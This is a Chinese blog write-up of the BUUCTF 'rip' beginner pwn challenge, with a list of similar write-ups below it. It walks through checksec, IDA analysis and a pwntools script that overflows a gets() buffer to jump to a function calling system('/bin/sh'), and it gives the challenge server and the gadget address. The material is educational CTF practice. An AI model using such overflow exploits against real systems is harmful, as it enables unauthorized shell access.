buuctf rip

原创于 2024-08-26 15:01:36 发布

· 230 阅读

0 ·

版权

文章标签：

#网络安全

首先用checksec检查一下

可以知道它是64bit的，并且没有栈溢出保护。我们用ida64打开，找到它的主函数，查看源码，可知s分配了15字节。

接着我们找到fun函数的源码，发现有/bin/sh和system函数，双击找到它的地址

再看fun函数的地址是0x401186

最后我们写一个python脚本,得到flag

from pwn import *
p = remote('node5.buuoj.cn', 26751)
p.sendline(b'a' * 15 + p64(0x401186))
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kids-syc

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF-rip 尝试PWN入门

brightendavid的博客

05-04

1704

BUUCTF-rip 拿到的是一个什么呢，感觉是一个小系统？但是也就是一个小程序嘛。这个程序就是执行一个输入输出的命令。但是这里面存在漏洞。这个s是15byte的字符在fun部分有一个/bin/sh 这个据说是一个系统级函数，为什么说是系统级函数呢，因为有一个system吧。一般会是什么用都没有。但是在使用这样的一个payload后,就可以利用，也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置？是不是这个解释呢。 #python3 需要预先安

BUUCTF PWN-RIP详解

weixin_43780092的博客

09-07

6027

BUU CTF PWN 入门知识详解

参与评论您还未登录，请先登录后发表或查看评论

pwn学习（3）BUUCTF-rip（函数知识/缓冲区溢出）

m0_66039322的博客

09-21

1008

1.函数调用栈是指程序运行时内存一段连续的区域。（特殊的内存）2.用来保存函数运行时的状态信息，包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时，调用函数（caller）的状态被保存在栈内，被调用函数（callee）的状态被压入调用栈的栈顶。4.在函数调用结束时，栈顶的函数（callee）状态被弹出，栈顶恢复到调用函数（caller）的状态5.函数调用栈在内存中从高地址向低地址生长，所以栈顶对应的内存地址在压栈时变小，退栈时变大。

buuctf-rip

最新发布

Nike_name的博客

06-13

764

利用get危险函数和system/bin/sh 的栈溢出

pwn | BUUCTF rip 1&& pwn基本思路

Mintind的博客

04-26

2870

（写得好详细我好爱（为什么payload有两种写法于。

BUUCTF PWN rip1 WP

m0_54262894的博客

07-31

2894

BUUCTF PWN rip 1 这是一个WP，也是一个自己练习过程的记录。先把文件放入pwn机中检查一下，发现并没有开启保护，所以应该是一道简单题我们运行一下试试，它让你输入一段字符然后将字符输出。把文件放在ida中查看一下发现main函数并不复杂，只是定义了一个 s ，而且我们很容易就能找到栈溢出的点，我们都知道gets函数是一个危险函数，对于我们来说它可以接受到无限的字符，所以这里就是我们要pwn掉的点。我们双击 s ，看它有多少空...

BUUCTF pwn rip

weixin_55190422的博客

11-03

429

现在开始是记录我个人对BUU上PWN题的刷题记录。首先是一个ELF文件，放到Linux里面来看。首先老套路checksec一下接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段我们发现里面有个系统调用函数。我们查看下汇编代码我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数所以payload: from pwn import * p = remote('node4.buuoj.cn',...

BUUCTF 【Pwn】rip 解题步骤

2301_81505831的博客

01-25

1063

查看之后发现是64位的ELF文件，直接放入IDA64进行反编译。

rip-BUUCTF（栈溢出）

yuqie的博客

06-14

636

使用ida反汇编程序，发现是一个栈溢出类型，从函数中可以看出给了一个s数组，但没有对输入的长度作限制，因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。发现并没有canary保护。使用gdb结合pwndbg调试进程，计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点，并使用r（run）运行。使用命令 n 按行运行，找到输入点，并随便输入几个字

【BUUCTF】rip

^_^

12-08

3439

这题和蒸米ROP的level3有点像。检查安全机制。用ida反汇编，可以看到是gets函数有个简单的栈溢出，偏移也很好计算，F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。正常exp如下： from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact

[buuctf] rip

zn106414的博客

03-31

770

64位，源程序几乎没有开启任何保护用ida打开存在危险函数gets，没有限制输入，存在栈溢出漏洞还有一个func函数执行了/bin/sh命令双击s来到Stack of main视图，发现只需存入15个字节即可劫持函数返回地址因为是64位程序，还需要加8字节的返回地址，因此偏移量为23 或者这里也可以使用pwntools计算一下： pattern create 200 pattern offset A(AADAA; 也可以...

BUUCTF-rip

m0_64180167的博客

04-11

729

看了这个文章我起码能理解我们栈溢出的目的在做题之前我们需要先理解栈的存储方法从上往下看就能理解入栈说回这道题目为什么这道题目是栈溢出。

BUUCTF -rip

weixin_56301399的博客

07-20

495

用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数，发现gets()函数读取输入到变量s中，s的长度只有0xf，即可用栈大小只有15字节，但是gets()函数并没有限制输入，显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位，各项保护都未开启。......

初学pwn-BUUCTF(rip)

天柱的博客

08-30

2820

初学pwn-writeUp BUUCTF平台的一道题目，rip。与之前同样的步骤，启动靶机，链接远端发现这里提示输入一些内容，但是输入完成之后，这里就结束了。还是要打开文件查看一下。看到这里，只有一个输入的过程可以操作，那就很清楚了，就是要栈溢出了。点进去看一下。可以看到这里s这个数组是15个字节，到r这个返回值还需要8个字节。不过这里要注意的一点是，这个15是十进制的，不能像之前再在数字之前加0x标记十六进制，这里可以直接写十进制。摁shift+f12，可以看到这时还有什么地址可能会用到，

[BUUCTF-pwn]——rip

Y_peak的博客

01-30

1295

BUUCTF——rip 题目地址：https://buuoj.cn/challenges 题目：同样我们现将文件下载下来，在Linux上用checksec 看下信息，发现这是一个64位程序，并且任何保护都没开。???? (任何保护都没开，基本就是栈溢出) 在window用IDA反汇编看看，打扰了main函数没有任何有用的东西，没有我们要找的system函数看看其他函数看看有没有，功夫不负有心人。fun函数中，有我们想要的东西赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x

[BUUCTF]PWN2——rip

mcmuyanga的博客

08-23

1846

[BUUCTF]-rip 题目网址：https://buuoj.cn/challenges#rip 步骤：例行检查附件，64位程序，没有开启任何保护 nc一下，看看输入点的提示字符串，让我们写入一个字符串，然后回显ok，bye 用对应位数的ida打开，shift+f12先来查看一下程序里有的字符串这里可以看到有bin/sh还有system函数，对于这两个我们比较敏感，因为system（/bin/sh）这句代码能让我们直接获取shell 双击bin/sh跟进，然后安装ctrl+x查看一下哪里调用了这

BUUCTF刷题之路-rip1

qq_30528603的博客

05-25

3089

因为A存入内存是以ASCLL码形式存在 0x41就是A，我们填入的15个A已经在栈上了，而且返回地址就是401100，我们要做的就是覆盖这个返回地址，指向我们的后门函数fun，至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址，因为题目没有开启PIE，所以程序每次加载的地址都是不变的。可以看到保护基本没开，是个很简单的栈溢出题目。左边这都是函数，带下划线的一般是系统提供的函数，我们分析前可以大致看看有哪些函数，都干了什么，对整体布局有个了解，我们一开始都回去分析main函数。